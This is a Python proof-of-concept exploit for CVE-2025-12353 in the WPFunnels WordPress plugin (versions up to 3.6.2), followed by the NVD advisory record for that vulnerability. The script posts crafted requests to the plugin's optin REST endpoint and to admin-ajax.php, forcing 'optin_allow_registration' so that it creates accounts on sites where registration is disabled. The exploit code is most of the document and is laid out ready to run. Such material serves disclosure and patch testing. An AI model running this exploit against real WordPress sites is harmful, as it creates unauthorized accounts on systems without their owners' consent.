CVE-2025-12353

import requests import urllib.parse # CVE-2025-12353 PoC - WPFunnels Unauthorized User Registration # Target: WordPress site with WPFunnels plugin <= 3.6.2 target_url = "http://target-wordpress-site.com/" # Step 1: Discover the funnel/optin form endpoint # Usually found in the funnel page or checkout flow funnel_endpoint = target_url + "wp-json/wpfunnels/v1/optin/submit" # Step 2: Prepare malicious registration payload # Bypass the site's user registration setting by controlling optin_allow_registration parameter payload = { "email": "[email protected]", "first_name": "Attacker", "last_name": "Test", "optin_allow_registration": "true", # Key parameter that bypasses site settings "funnel_id": "1", "step_id": "1" } # Step 3: Send the malicious request headers = { "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" } try: response = requests.post(funnel_endpoint, data=payload, headers=headers, timeout=10) # Check if user was registered successfully if response.status_code == 200: result = response.json() if result.get('success') or 'user' in str(result).lower(): print("[+] SUCCESS: User account created despite registration being disabled!") print(f"[+] Response: {result}") else: print("[-] Request sent but registration may have failed") else: print(f"[-] Request failed with status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") # Alternative: Direct registration form bypass # If the optin form is embedded in a page alt_payload = { "action": "wpfnl_optin_submit", "optin_allow_registration": "1", "email": "[email protected]", "wpfunnels_optin_data": "1" } print("\n[*] Testing alternative endpoint...") alt_response = requests.post(target_url + "wp-admin/admin-ajax.php", data=alt_payload, headers=headers, timeout=10) print(f"[*] Alternative response status: {alt_response.status_code}")

{"cve": {"id": "CVE-2025-12353", "sourceIdentifier": "[email protected]", "published": "2025-11-08T04:15:45.410", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WPFunnels – The Easiest Funnel Builder For WordPress And WooCommerce To Collect Leads And Increase Sales plugin for WordPress is vulnerable to unauthorized user registration in all versions up to, and including, 3.6.2. This is due to the plugin relying on a user controlled value 'optin_allow_registration' to determine if user registration is allowed, instead of the site-specific setting. This makes it possible for unauthenticated attackers to register new user accounts, even when user registration is disabled."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3389604/wpfunnels/trunk/public/class-wpfnl-public.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4e376c96-47a8-419f-ab45-f7c46510c767?source=cve", "source": "[email protected]"}]}}